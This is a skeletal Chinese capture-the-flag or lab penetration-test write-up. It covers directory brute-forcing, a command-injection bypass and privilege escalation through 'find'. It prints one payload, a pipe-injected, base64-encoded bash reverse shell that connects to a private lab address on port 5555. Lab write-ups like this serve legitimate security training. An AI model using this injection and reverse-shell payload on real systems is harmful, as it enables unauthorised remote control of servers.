文章目录 一、信息收集二、攻击过程1.渗透2.提权 总结 一、信息收集 用哥布林大字典 二、攻击过程 1.渗透 命令执行漏洞,尝试绕过 反弹成功 反弹命令: 127.0.0.1|echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuNTgvNTU1NSAwPiYx|base64 -d|bash 2.提权 find提权 总结